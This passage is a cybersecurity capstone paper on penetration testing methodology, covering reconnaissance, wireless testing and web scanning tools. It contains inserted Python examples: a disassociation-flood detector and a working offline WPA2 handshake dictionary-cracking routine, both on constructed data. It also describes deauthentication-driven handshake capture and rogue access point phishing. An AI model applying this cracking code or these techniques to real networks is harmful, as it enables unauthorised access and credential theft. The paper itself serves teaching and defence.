Penetration Testing Methodologies
by
Mathew Stuart
A Capstone Project Submitted to the Faculty of
Utica College
December 2019
in Partial Fulfillment of the Requirements for the Degree of
Master of Science in Cybersecurity
© Copyright 2019 by Mathew Stuart
All Rights Reserved
Abstract
Given the rising trend in security breaches among organizations worldwide,
cybersecurity has become an increasingly important role in the public and private industry
sectors. In addition, the cybersecurity workforce gap has left many organizations without
qualified professionals to secure their data. There is a growing need to educate and employ
cybersecurity professionals in both commercial organizations and government.
The main barriers to beginning a career in cybersecurity are gaining advanced and
relevant knowledge and experience in cybersecurity. Knowledge can be difficult and time
consuming to obtain, and training can cost money. Because of the barriers to beginning a career
in cybersecurity, a single source of information that leads to knowledge and experience in
cybersecurity is valuable.
The purpose of this research was to develop a cybersecurity penetration testing
methodology template for use by aspiring cybersecurity professionals to practice penetration
testing and develop a personalized methodology. What are the common penetration testing tools
and methods for attacking a network or environment from the Internet? What are the common
penetration testing tools and methods for attacking a network or environment from the Intranet?
What are the common penetration testing tools and methods for attacking web applications? This
research is important because penetration testing experience leads to advanced knowledge in
cybersecurity, which is an advantage when beginning a career in cybersecurity. Understanding
cybersecurity concepts through a security analysis provides a tester with conceptual knowledge
and hands-on experience. Through the process of developing a penetration testing methodology,
an aspiring cybersecurity professional will learn about cybersecurity tools, technologies and
procedures.
Acknowledgments
My first acknowledgment is to Professors Krystina Horvath and Anna Ragno for their
guidance and assistance throughout this project. Their feedback has been valuable and
educational throughout this project. I would also like to thank family, especially my wife and
mother, for all their support throughout these past 7 years as I worked and went to school at the
same time. If not for their support and encouragement, I may not have reached this point in my
education and career. I would also like to thank Utica College for providing the technical and
hands-on education that I was searching for. I learned a great deal from every course, and I was
able to utilize that knowledge to gain employment in the cybersecurity industry. Lastly, I would
like to thank Michael Denny for taking the time to lend his experience and expertise and be the
second reader of this paper.
Table of Contents
List of Illustrative Materials ............ vi
Statement of the Problem ............ 1
Literature Review ............ 7
    Introduction to Penetration Testing ............ 7
    Intelligence Gathering ............ 9
    Wireless Networks ............ 10
    Web Application Testing ............ 14
    Intranet ............ 18
        Scanning and discovery ............ 18
        Exploitation and gaining access ............ 22
        Persistence and spreading ............ 25
        Data gathering and extraction ............ 29
        Covering tracks ............ 31
Discussion of the Findings ............ 32
    Wireless Tool Benefits ............ 33
    Web Application Testing Results ............ 33
    Intranet Security Testing Results ............ 36
    Commonalities ............ 44
Conclusion ............ 46
References ............ 49
Appendix A ............ 55
Appendix B ............ 57
List of Illustrative Materials
Figure 7. Nikto Command and Output From a Generic Scan ............ 34
Figure 8. ZAP Automated Scan Configuration Screen ............ 35
Figure 9. ZAP Automated Scan Results ............ 35
Figure 10. Nmap device enumeration command ............ 37
Figure 11. How to Start a Scan in OpenVAS ............ 38
Figure 12. Results From OpenVAS Scan ............ 39
Figure 13. Enum4linux LDAP Output ............ 40
Figure 14. Enum4linux Users Output ............ 41
Figure 15. Enum4linux Password Policy Output ............ 42
Table 1. Example of Basic Nmap Command Options ............ 55
Table 2. Nmap Stealth Scanning Options ............ 55
Figure 1. Nikto Options 1 ............ 57
Figure 2. Nikto Options 2 ............ 58
Figure 3. ARP Poisoning Before and After ............ 59
Figure 4. Enum4Linux Help Page Output ............ 60
Figure 5. Syntax for Metasploit ............ 61
Figure 6. Spear Phishing Model: Targeted Cyber Attack ............ 62
Statement of the Problem
Penetration Testing Methodologies
In the realm of cybersecurity, there are two main roles: red team and blue team. Blue
teams are the teams of cybersecurity professionals who defend an environment from
compromise. In the event of a compromise, the blue team responds to those incidents for the
purposes of both minimizing the degree of compromise and gaining knowledge regarding the
attack. Blue teams also use data gathered about an attacker for investigations by either their
organization and/or law enforcement.
A red team is a team of cybersecurity professionals whose purpose is to attack an
organization’s environment for the purpose of authorized security testing, audit and analysis. Red
teams only perform offensive actions at the request of those whom they are testing; therefore,
offensive testing is always agreed upon beforehand, with strict rules for the teams to follow.
These rules include a list of acceptable and unacceptable actions, and the scope in which the
attack will be conducted (NIST, 2019).
A blue team member or member on the defensive side of cybersecurity needs to know
more than just how to utilize tools to defend a network. A well-rounded security professional
also needs to understand how to perform offensive operations. It is imperative that cybersecurity
professionals understand how an attacker can penetrate an environment, which will inform the
cybersecurity professional how to defend against these types of attacks (NIST, 2019).
Penetration testing (Pentesting) can help test the blue team’s incident response skills and
methods. A penetration test also helps a blue team identify an organization’s vulnerabilities, and
allows the blue team to make modifications to systems and processes. The process of penetration
testing also promotes a proactive approach to blue teaming. If a blue team knows that an
environment will be the target of a pentest, they are likely to perform their own ad-hoc
penetration test to identify and remediate vulnerabilities ahead of time. This is often the case
when penetration tests are required for regulation and compliance purposes (Sanabria, 2018).
According to the Offensive Security organization, offense is the best defense. The only
way to be confident that risk mitigation strategies protecting a company against cyber-attacks
will be effective is through simulation, or pro-actively testing security measures before a real
intruder does. By encouraging students to put themselves in the shoes of a hacker by utilizing the
same tools and techniques, Offensive Security is leveling the playing field for defenders
(Offensive Security, 2019).
In order to secure an environment, it is critical that a cybersecurity professional
understand how a potential attacker would attempt to penetrate an organization’s environment.
The need for offensive security knowledge grows as the number of successful cyber-attacks
increases each year. The number of successful security breaches in the U.S. for 2016 was 1,091,
which was 40% more than the 780 breaches in 2015. Similarly, there were 1,579 data breaches in
the United States in 2017, which was a 44.7% increase from 2016 (Identity Theft Resource
Center, 2018).
The shock of data breach frequency is compounded by the average cost of a data breach
in the United States. IBM’s report on data breaches states that the average cost of a data breach
in the United States is $8.19 million per breach (IBM, 2019). With the risk of an organization
losing millions of dollars, and the possibility of millions more in lost revenue due to a damaged
reputation as the result of a data breach, organizations are on the lookout for qualified
cybersecurity professionals to protect their environments.
There is currently a severe shortage of qualified cybersecurity professionals worldwide.
A study conducted by Cybersecurity Ventures states “A 2016 skills gap analysis from ISACA
estimated a global shortage of 2 million cybersecurity professionals by 2019 (a half-million more
than Symantec’s prior estimate), according to the United Kingdom House of Lords Digital Skills
Committee” (Morgan, 2017). In the United States, there was a shortage of about 314,000
cybersecurity professionals as of January 2019 (Crumpler & Lewis, 2019). The data breach
frequency, costs to an organization per data breach, and the large cybersecurity professional’s
workforce gap all outline the need for more cybersecurity professionals. An increase in
cybersecurity professionals to fill the workforce gap will also increase the security posture of
organizations in the United States and around the world.
One of the questions regarding the cybersecurity professional’s workforce gap is why the
gap exists in the first place. The International Information Systems Security Certification
Consortium, also known as ISC2, performed a study in 2018 regarding the mentioned workforce
gap and it showed that “Despite [cybersecurity] professionals looking to shift priorities, as well
as other concerns and challenges, 68% of respondents say they are somewhat or very satisfied
with their jobs” (International Information Systems Security Certification Consortium, 2018).
With most cybersecurity professionals satisfied with their jobs, the question remains as to
why more people are not filling the workforce gap. The International Information Systems
Security Certification Consortium (ISC2) also investigated this issue. According to ISC2’s
survey, 34% of people surveyed do not know which career path opportunities lead to a role in
cybersecurity, 32% of organizations do not know about cybersecurity skills, and the same
percentage of people surveyed cannot afford certification training and/or the certifications
themselves. Twenty-eight percent of people surveyed cannot afford the formal education to
prepare them for a career in cybersecurity, and 26% of people surveyed said they do not have
enough experience in cybersecurity to get a job in the industry. This is a problem because 49% of
organizations surveyed in the same survey stated that the most important qualification for
employment is relevant cybersecurity work experience, while 40% of organizations stated that
extensive cybersecurity work experience is the most important qualification for employment
(International Information Systems Security Certification Consortium, 2018). It is difficult to
begin working in the cybersecurity industry if one does not have prior cybersecurity experience.
Between the time it takes to learn cybersecurity skills, the costs of training, and the
requirement for prior cybersecurity experience, it is not surprising that there is such a large
workforce gap. The lack of quality, open-source training materials that cover the steps needed to
learn cybersecurity, specifically offensive security, is the main issue. Offensive security is so
important because the previously mentioned ISC2 survey reported that 47% of organizations
named advanced cybersecurity concepts as the most important qualification for employment.
Another 40% believe relevant cybersecurity experience is the most important factor for
employment, meaning that 87% of organizations require prior experience for employment
(International Information Systems Security Certification Consortium, 2018).
Offensive security knowledge falls under advanced cybersecurity concepts and relevant
cybersecurity knowledge, making penetration testing and red team skills the most coveted skill
set. Gaining knowledge and experience in the cybersecurity field can occur at home during a
person’s spare time. There are ways of creating home cybersecurity testing labs that allow a
person to test and practice what they learn. In one example, a cybersecurity student, Vitaly Ford,
posted instructions on how to create such a lab environment using virtual machines. Ford’s blog
post also provides links to resources like virtual machine images that can easily be used with
virtual machine hosting software, also known as a hypervisor. An example of a hypervisor is
VirtualBox. Ford’s directions on first steps are to:
learn how to install a virtual machine (and a hypervisor), which is typically performed in
Microsoft Hyper-V, Oracle VirtualBox, or VMWare Workstation/Fusion. In addition, one can
begin thinking about developing a networking diagram that will help a pentester stay on track
once the pentester installs virtual machines and connects them together (Ford, 2017).
Ford’s steps are one option, among several, to gain hands-on experience and cybersecurity
knowledge. Hands-on penetration testing experience is possible through the utilization of
penetration testing environments provided by the hosts of hackthebox.eu. If a user can gain
credentials and create an account in hackthebox.eu, that user is able to utilize the OpenVPN
config file for their Hack the Box account, which accesses a testing network. This would allow
the user to perform attacks against pre-setup machines in the environment and, thus, test what
was learned in regard to penetration testing. “Hack the Box is an online platform allowing you to
test your penetration testing skills and exchange ideas and methodologies with thousands of
people in the security field” (Hack the Box, 2019). The pre-setup machines in Hack the Box’s
environment range in difficulty gaining user and root credentials. Once a tester gains one or both
credentials, they submit the credentials to Hack the Box, who gives points for correct credentials.
Practicing penetration testing with the easier machines is often a good start and a great learning
experience.
This paper addresses the lack of penetration testing methodology templates that
beginners in the field of cybersecurity should utilize to develop a personalized penetration testing
method that works best for them. There is a lack of cybersecurity learning materials available for
new professionals that overview how to use different tools and how to utilize tools at each step
of a penetration test. In search of advanced cybersecurity conceptual knowledge, the main
barriers to entering the cybersecurity field are time, money and a lack of cybersecurity
experience. A penetration testing template would assist an information technology professional
gain cybersecurity knowledge and experience.
Those with little to no cybersecurity experience who wish to perform penetration
tests tend to research multiple online sources in order to gain the knowledge they need. Instead,
there should be a single template for penetration testing best practices with tool syntax and
examples which provide a starting point for beginners to develop their own pentesting
methodology.
This paper begins the journey of gaining penetration testing knowledge and experience
for those who wish to learn how a pentest is performed from beginning to end. It also includes
steps on how to discover hosts, find vulnerabilities, exploit example vulnerabilities, maintain
persistence on a machine, exfiltrate data and erase evidence of an attack to cover the attacker’s
tracks. The mentioned penetration testing steps include syntax for the tools covered in this paper,
and best practices on how to use those tools.
The purpose of this research is to review different penetration testing methodologies and
to discuss the advantages and disadvantages of each methodology in order to provide a best practice
method for attacking networks. The networks and environments that will be explored are the
Intranet, Internet and web applications. This will focus on information at a beginner’s level, thus
creating a template that can be used as a baseline for creating a more advanced and personalized
methodology as a user’s skills and knowledge increase over time and through practice.
In order to provide best practices, the following questions will be answered: what are the
common penetration testing tools and methods for attacking a network or environment from the
Internet? What are the common penetration testing tools and methods for attacking a network or
environment from the Intranet? What are the common penetration testing tools and methods for
attacking web applications?
Literature Review
Introduction to Penetration Testing
There are three different types of penetration tests: Black Box, White Box, and Grey
Box. The type of penetration test that is performed depends on the amount of information that is
provided to the tester before testing begins. Black Box testing is conducted when the tester is
given no information about an organization’s network or code. White Box testing is when the
tester is given full knowledge of an organization’s network or source code. Grey Box testing is a
combination of White and Black Box testing, meaning that the tester has a limited knowledge of
the network or source code (Khan & Khan, 2012). The seven main phases of a penetration test
are as follows:
• Discovery
• Enumeration/Info Gathering
• Exploitation
• Privilege escalation
• Persistence/Maintaining Access
• Covering Tracks
• Documentation/Reporting
(Ali, Allen, & Heriyanto, 2014, pp. 60-66).
In the book Advanced Penetration Testing for Highly-Secured Environments (2016), the
authors explain the Penetration Testing Execution Standard (PTES) and outline the standard’s
structure. The seven sections of the PTES are pre-engagement interactions, intelligence
gathering, threat modeling, vulnerability analysis, exploitation, post-exploitation, and reporting.
The PTES explanation does not include a technical guide for the standard, but it does reference
the URL http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines, which is a
technical guide for the PTES. In the PTES technical guideline, the steps are broken down into
smaller steps with technical information, but the core of the guideline is the same as the
guideline found in Advanced Penetration Testing for Highly-Secured Environments (2016)
(Allen & Cardwell, 2016, p. 11).
Standards in penetration testing are often vague, general and procedural in nature, as
opposed to being technical, which provides specific details. A commonality throughout
penetration testing is the use of tools and toolsets to perform those tests. Open-source tools are
most often used to perform penetration tests. Penetration testers use stand-alone tools and
toolsets. These toolsets are chosen by their effectiveness and the tester’s familiarity with the tool.
If the tester is not familiar with their tools, the test will not be effective. There are many open-
source and paid tools, but testers need to choose their toolsets to fit the needs of the test. As an
example, in an application security test, Aircrack-ng would not normally be necessary because
Aircrack-ng was made for wireless network testing and the test is performed on a software’s
security and not the security of the network. The same could be said if the situation was reversed
where a static code analyzer would not be required for a network penetration test. Ensuring the
toolset matches the test and the penetration tester is familiar with their toolset is easily the most
important aspect of a penetration test (Velu, 2017, pp. 201-206).
Intelligence Gathering
The discovery phase begins with intelligence gathering and the discovery of devices that
could be compromised. The three intelligence gathering methodologies are open source
intelligence (OSINT), cyber intelligence (CYBINT) and human intelligence (HUMINT). Cyber
intelligence involves finding information about the target on the Internet, which is a subset of
open source intelligence. This means finding intelligence via an open source tool or platform.
Another intelligence gathering location is online social networks (OSNs). OSNs are part of
CYBINT, and for good reason as OSNs commonly have a wealth of data on individuals within a
company and on the organization itself (Sood & Enbody, 2014, pp. 23-34).
Human intelligence occurs when an attacker acquires information about the target by
analyzing responses from people through direct interaction. This can include phishing emails or
physically posing as someone else to trick the target into providing the attacker information.
These practices are also known as social engineering (Sood & Enbody, 2014).
Social media has changed open source intelligence in a profound way. Through OSN,
intelligence on both individuals and organizations is discoverable through social media accounts
such as Facebook, YouTube, Instagram, Snapchat, and Twitter. When reviewing the target’s
social media posts, it is possible to gather the target’s location during certain times of day, friend
lists, liked pages, and group associations. The information gathered during OSN provides the
attacker with an overview of what the target likes and what kind of information they are most
receptive to. This can give an attacker the information needed to manipulate a user through social
engineering as part of an attack against the specific user or an organization (Bahybars-Hawks,
2015, pp. 155-172).
OSINT also includes discovering publicly facing devices of a target organization. This
could include websites, Internet accessible servers and/or Internet accessible networking
equipment. The target discovery phase mostly entails identifying the status of a target’s network,
operating system (OS), and mapping out the organization’s information technology
infrastructure. This provides the penetration tester with a better understanding of the
technologies or devices used within an organization and may further help the tester in
enumerating services. By utilizing tools in Kali Linux, the tester can determine what hosts are
live on a network, which operating systems are running on the local hosts, and will be able to
characterize each device according to its role. The tools in Kali Linux often utilize active and
passive detection techniques in addition to network protocols where they can be manipulated in
various ways to gather information from the OS and running services (Ali, Allen, & Heriyanto,
2014, pp. 82-83).
There are several sources for gaining syntax for certain tools. Online cheat sheets and
user guides are a great way to gain a basic understanding of a tool’s syntax and uses.
Wireless Networks
When a penetration test involves compromising a wireless network, it can end up being
the key to compromising an entire company. Some tools and toolsets in Kali Linux are useful
when attempting to test a wireless network’s security. Two of the most widely used toolsets are
Aircrack-ng and Kismet.
Kismet can be used as a wireless detector, sniffer, and intrusion detection system. Kismet
can detect and sniff the name of the wireless network along with its broadcast ID (BSSID), the
channel it is broadcasting on, the MAC address of the wireless access point (WAP), and the
MAC address clients use to connect to the wireless network. Kismet supports some plugins that
expand the wireless protocols that can be sniffed (Beggs, 2017, pp. 206-207). It can also sniff the
other Institute of Electrical and Electronics Engineers (IEEE) Wi-Fi standards 802.11a, 802.11b,
802.11g, and 802.11n traffic. These different IEEE 802.11 standards are wireless local area
network (WLAN) standards that, among other features, denote the speed and security of
wireless traffic. The latest IEEE standard for wireless networks is 802.11ay, which allows a
possible 20 gigabits per second download and upload speed (IEEE, 2019).
Kismet performs reconnaissance by placing the attacker’s wireless network interface card
(WNIC) in promiscuous mode and activating Kismet, which will capture packets transmitted
over the air and discover the different SSIDs in the area, along with cell towers for mobile data
traveling through the air. The information gathered by Kismet is useful in different ways. For
example, knowing the wireless security protocol will allow the attacker to determine the
appropriate decryption module in Aircrack-ng to extract authentication information. Knowing
the MAC address allows the attacker to attempt to perform different types of attacks. For
example, a tester can perform an Omerta attack if the wireless access point (WAP) is an
unpatched Aruba WAP. Kismet obtains a variety of information when sniffing the 802.11
standard spectrum (Beggs, 2017, pp. 206-207). “Omerta is an 802.11 DoS tool that sends
disassociation frames to all stations on a channel in response to data frames. The Omerta attack
is characterized by disassociation frames with a reason code of 0x01” (Aruba Networks, 2019).
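The Aruba description quoted above gives a concrete signature a wireless monitor can look for: a burst of disassociation frames carrying reason code 0x01. The following is an added example, not part of the paper and not code from Kismet or Aruba, of how a small wireless intrusion-detection check would parse 802.11 management-frame headers and alert on such a burst. The frame layout follows the 802.11 MAC header (Frame Control, Duration, three addresses, Sequence Control, then the reason code for disassociation and deauthentication frames); the MAC addresses, timestamps and frame counts in the sample capture are constructed for the demonstration, and the window and threshold values are assumptions a deployment would tune.

```python
import struct
from collections import defaultdict, deque

# 802.11 management-frame subtypes; Frame Control byte 0 = (subtype << 4) | (type << 2) | version
SUBTYPE_DISASSOC = 0x0A
SUBTYPE_DEAUTH = 0x0C
REASON_UNSPECIFIED = 0x0001   # the reason code the Aruba text attributes to the Omerta flood
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def build_mgmt_frame(subtype: int, dst: str, src: str, bssid: str, reason=None) -> bytes:
    """Construct a minimal 802.11 management frame (no FCS) for the sample capture.
    Header: Frame Control(2) Duration(2) Addr1(6) Addr2(6) Addr3(6) SeqCtl(2), then the body."""
    frame_control = bytes([(subtype << 4) & 0xF0, 0x00])   # type 0 = management, version 0
    header = (frame_control + b"\x00\x00" + mac_bytes(dst) + mac_bytes(src)
              + mac_bytes(bssid) + b"\x00\x00")
    body = struct.pack("<H", reason) if reason is not None else b""   # reason code, little-endian
    return header + body


def parse_mgmt_frame(frame: bytes):
    """Return the header fields of a management frame, or None for non-management or truncated frames."""
    if len(frame) < 24:
        return None
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, (fc0 >> 4) & 0x0F
    if version != 0 or ftype != 0:
        return None
    reason = None
    if subtype in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
        if len(frame) < 26:
            return None
        reason = struct.unpack_from("<H", frame, 24)[0]
    return {"subtype": subtype, "receiver": mac_str(frame[4:10]),
            "transmitter": mac_str(frame[10:16]), "bssid": mac_str(frame[16:22]),
            "reason": reason}


def detect_disassoc_floods(capture, window=1.0, threshold=10):
    """Sliding-window detector: alert once per (transmitter, BSSID) that sends `threshold` or more
    disassociation/deauthentication frames within `window` seconds.
    `capture` is an iterable of (timestamp_seconds, raw_frame_bytes)."""
    recent = defaultdict(deque)     # (transmitter, bssid) -> deque of (ts, reason, receiver)
    alerted = set()
    alerts = []
    for ts, frame in sorted(capture, key=lambda item: item[0]):
        hdr = parse_mgmt_frame(frame)
        if hdr is None or hdr["subtype"] not in (SUBTYPE_DISASSOC, SUBTYPE_DEAUTH):
            continue
        key = (hdr["transmitter"], hdr["bssid"])
        queue = recent[key]
        queue.append((ts, hdr["reason"], hdr["receiver"]))
        while queue and ts - queue[0][0] > window:      # drop frames that fell out of the window
            queue.popleft()
        if len(queue) >= threshold and key not in alerted:
            alerted.add(key)
            reasons = [r for _, r, _ in queue]
            alerts.append({
                "transmitter": key[0],
                "bssid": key[1],
                "count": len(queue),
                "window_start": queue[0][0],
                "window_end": ts,
                "reason_0x01_share": reasons.count(REASON_UNSPECIFIED) / len(reasons),
                "broadcast": any(rcv == BROADCAST for _, _, rcv in queue),
            })
    return alerts


def sample_capture():
    """Constructed sample (not a real capture): 20 broadcast disassociation frames in half a second
    carrying the access point's address, one ordinary deauthentication from a station leaving the
    network (reason code 3), and one beacon. Only the burst should alert."""
    ap, station = "00:11:22:33:44:55", "66:77:88:99:aa:bb"     # made-up addresses
    frames = [(100.0 + i * 0.025,
               build_mgmt_frame(SUBTYPE_DISASSOC, BROADCAST, ap, ap, REASON_UNSPECIFIED))
              for i in range(20)]
    frames.append((200.0, build_mgmt_frame(SUBTYPE_DEAUTH, ap, station, ap, 0x0003)))
    frames.append((200.5, build_mgmt_frame(0x08, BROADCAST, ap, ap)))   # beacon, subtype 8
    return frames


if __name__ == "__main__":
    for alert in detect_disassoc_floods(sample_capture()):
        print(alert)
```

The detector keys on the transmitter and BSSID pair so that a single station disconnecting normally never reaches the threshold, while a burst of broadcast disassociations with reason 0x01 from one address produces one alert with the share of 0x01 reason codes recorded for the analyst. On a real monitor the frames would come from a monitor-mode interface or a pcap rather than from `sample_capture()`.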
Authentication information that a wireless network uses allows a security tester to find
any weak authentication protocols used, and depending on the protocols, there may be known
vulnerabilities and possible exploits.
Another well-known open-source wireless security tool is Aircrack-ng. The
toolset specializes in wireless security testing and is comprised of an array of tools that can
perform most any task required during a wireless security penetration test. The following is a list
of each tool in the Aircrack-ng tool suite and their uses:
• Airbase-ng – used for rogue access point creation.
• Aircrack-ng – a cracking and recovery tool for WEP and WPA/WPA2 keys.
• Airdecap-ng – decryption for WEP and WPA/WPA2 wireless traffic.
• Airdecloak-ng – used for bypassing WEP cloaking, which is a WEP method for
fooling WEP cracking tools.
• Aireplay-ng – creates wireless traffic for attacks.
• Airmon-ng – places the WNIC into promiscuous mode to view all traffic.
• Airodump-ng – used for 802.11 protocol monitoring and sniffing.
• Airodump-ng-oui-update – updates the Organizationally Unique Identifier (OUI)
database.
• Airolib-ng – maintains a local database of ESSIDs, passphrases and precomputed
PMKs to use in cracking.
• Airserv-ng – sets up a local server to allow other devices to access the wireless
network.
• Airtun-ng – creates virtual tunnel interfaces.
• Besside-ng – an automated WEP and WPA attacking tool for cracking all WEP-
protected networks that the WNIC can see. It also records all the WPA
handshakes.
• Easside-ng – sets up communication via a virtual WEP-protected AP without a
WEP key.
• Packetforge-ng – can create fake wireless network packets for other attacks.
• Tkiptun-ng – can inject a few frames into a WPA TKIP network with quality of
service (QoS).
(Fadyushin & Popov, 2016, pp. 154-159).
Penetration testers can crack a Wi-Fi protected access 2 (WPA2) key using Airmon-ng to
place the interface into promiscuous mode so that the interface can view all packets traveling
through the air. The next step is to use Airodump-ng to take that captured data and “dump” it
into a table. The Aireplay-ng tool forces de-authentication of a wireless client, which forces the
target to re-authenticate to the WAP. This allows Airodump-ng to capture the WPA handshake
as it travels over the air. Aircrack-ng decrypts and recovers the key, which authenticates the
tester to the wireless network (Fadyushin & Popov, 2016, pp. 154-159).
Decryption is part of most penetration testing processes. Wireless network handshakes
are one example, and captured passwords from compromised machines are examples where
decryption is necessary. There are several types of wireless network authentication methods and
security protocols.
The password cracking section of the PTES describes how to crack passwords for
different wireless security protocols. WPA-PSK can be used to brute-force the password to the
SSID. WPA is an acronym for Wi-Fi Protected Access and PSK stands for Pre-Shared Key. To
accomplish a successful decryption, the authentication handshake between a client and the WAP
must be captured using a tool such as Wireshark or Airodump-ng. The next step is to
decrypt the authentication handshake, which reveals the password. The Penetration Testing
Standard mentions that the Aircrack-ng tool suite is made specifically for this type of task and is
a standard in open source tools for cracking wireless authentication encryption (Pentest-
Standard, 2012).13
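The two passages above describe capturing a WPA2 four-way handshake and then "decrypting" it. The following example was added for this edit and is not code from the paper or from the Aircrack-ng project; it shows what aircrack-ng actually does with such a capture. The SSID, passphrase, MAC addresses and nonces are constructed so that a handshake can be generated offline, while the key derivation (PBKDF2 to the PMK, the 802.11i PRF to the KCK, and an HMAC-SHA1 MIC over message 2) is the real WPA2-PSK algorithm. The cracking step never decrypts anything; it recomputes the MIC for each candidate passphrase and compares.

```python
import hashlib
import hmac
from typing import Optional

# Constructed example: every value below is made up here so the "capture" can be
# generated offline. Nothing in this block comes from a real network.
SSID = b"ExampleNet"
REAL_PASSPHRASE = "Winter2019"
AP_MAC = bytes.fromhex("001122334455")
CLIENT_MAC = bytes.fromhex("66778899aabb")
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()
MIC_OFFSET = 81  # EAPOL header (4 bytes) + key descriptor fields preceding the MIC (77 bytes)


def pmk(passphrase: str, ssid: bytes) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID.
    This is the expensive step, and it depends only on SSID and passphrase, which is
    why airolib-ng can precompute PMKs per SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def kck(pmk_: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Key Confirmation Key: the first 16 bytes of the PTK produced by the 802.11i PRF-384
    over AP MAC, client MAC and both nonces (min/max ordering as in the standard)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = b"".join(
        hmac.new(pmk_, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3))
    return ptk[:16]


def eapol_m2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key frame as sent by the client in message 2 of the four-way handshake."""
    body = (b"\x02"                  # descriptor type: RSN
            + b"\x01\x0a"            # key info: pairwise, MIC present, descriptor version 2
            + b"\x00\x10"            # key length
            + b"\x00" * 8            # replay counter
            + snonce                 # SNonce (32 bytes)
            + b"\x00" * 16           # key IV
            + b"\x00" * 8            # key RSC
            + b"\x00" * 8            # key ID
            + mic                    # key MIC (16 bytes)
            + b"\x00\x00")           # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def compute_mic(kck_: bytes, frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the entire EAPOL frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck_, zeroed, hashlib.sha1).digest()[:16]


def make_capture() -> dict:
    """What airodump-ng hands to aircrack-ng: SSID, both MACs, both nonces, and message 2 with its MIC."""
    k = kck(pmk(REAL_PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    signed = eapol_m2(SNONCE, compute_mic(k, eapol_m2(SNONCE)))
    return {"ssid": SSID, "aa": AP_MAC, "spa": CLIENT_MAC,
            "anonce": ANONCE, "snonce": SNONCE, "eapol": signed}


def crack(capture: dict, wordlist) -> Optional[str]:
    """Offline dictionary attack. The handshake is never decrypted: each candidate passphrase
    is pushed through PBKDF2 -> PRF -> HMAC and the resulting MIC compared to the captured one."""
    captured_mic = capture["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        k = kck(pmk(candidate, capture["ssid"]), capture["aa"], capture["spa"],
                capture["anonce"], capture["snonce"])
        if hmac.compare_digest(compute_mic(k, capture["eapol"]), captured_mic):
            return candidate
    return None


if __name__ == "__main__":
    print(crack(make_capture(), ["password", "Summer2019", "Winter2019"]))  # Winter2019
```

Because the PMK depends only on the SSID and the passphrase, the 4096-iteration PBKDF2 step can be computed once per SSID and reused across every handshake captured on that network; that precomputed table is what airolib-ng maintains, and it is also why a rare SSID gives a defender a small but real advantage.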
Regarding password cracking, John the Ripper (JTR) is an open source tool that cracks
hashes to reveal passwords. JTR handles NTLM hashes as well as Kerberos and the operating
system password hashes of Linux and Macintosh devices, depending on the version of JTR that
is running. It can also be used against WPA/WPA2 handshakes captured over the air during a
packet sniff (Fadyushin & Popov, 2016, pp. 154-159); WEP, by contrast, is broken statistically
with Aircrack-ng rather than by guessing a passphrase. JTR cracks a hash by hashing candidate
passwords taken from a wordlist, generated by mangling rules, or enumerated by brute force, and
comparing each result with the captured hash. This differs from rainbow tables, which are
precomputed chains of hashes used as a time-memory trade-off; JTR does not rely on them.
As mentioned previously, another way to attack a wireless network is to pose as the
wireless network itself. This is accomplished by performing a modified combination of a man-
in-the-middle and phishing attack called AP phishing.
AP phishing, or access point phishing, is an attack that involves a rogue access point that
serves a web portal asking users for sensitive information. If performed correctly, the
users will not realize they are being phished, assuming they normally enter credentials in
a captive web portal to access the network. This works best when spoofing access points in public
areas such as coffee shops. Airpwn-ng, a wireless packet-injection tool maintained separately from
the Aircrack-ng suite, can inject the phishing page into a client's traffic, while Airbase-ng from
the suite itself can stand up the rogue access point (Fadyushin & Popov, 2016, pp. 154-159).
Web Application Testing
Referring to the Open Web Application Security Project (OWASP), the OWASP
penetration testing methodologies page of its website lists reasons for performing web
application penetration tests and references the Penetration Testing Execution Standard (PTES).
OWASP also refers to the Payment Card Industry Data Security Standard (PCI DSS) compliance
requirement for penetration testing and offers some guidance on the framework for compliance
testing. There are also pages that outline NIST SP 800-115, the Technical Guide to Information
Security Testing and Assessment, and the Information Systems Security Assessment Framework
(ISSAF). Other methodologies outlined are the Open Source Security Testing Methodology Manual
(OSSTMM) and the FedRAMP Penetration Test Guidance. This is important for web application
penetration testing, as there is always a reason for a test. Regulatory compliance can often be
that reason. Understanding the web application penetration testing compliance standards is
critical to performing the correct test for the organization (OWASP, 2019).
The Zed Attack Proxy (ZAP) was developed by OWASP as an open-source tool for
the sole purpose of finding web application vulnerabilities. The tool has a variety of functions
allowing automated and manual testing of an application. The OWASP ZAP user guide on
GitHub contains an explanation of the different settings that the ZAP tool offers (Psiinon, 2015).
ZAP has multiple modes that govern what the tool is allowed to do. As an example, safe mode
tells the tool to refrain from any potentially dangerous action, such as active scanning, that
could alter or hinder a web application. Protected mode is the next level up from safe mode and
allows potentially dangerous actions only against URLs that are in scope. Standard mode is the
default mode when a tester installs and opens the tool, and allows the security tester to perform
whichever tests they want. Lastly, attack mode actively scans each in-scope URL as soon as it is
discovered, running all tests and attacks available against it (Psiinon, 2015).
There are several other tools available to assist a security analyst throughout the process
of performing a web application penetration test. One such tool is Nikto, which is an open source
web server scanner that looks for dangerous URL paths, index pages, HTTP server options, server OS
and web hosting software. Because the program reports URL paths and index pages, not all of the
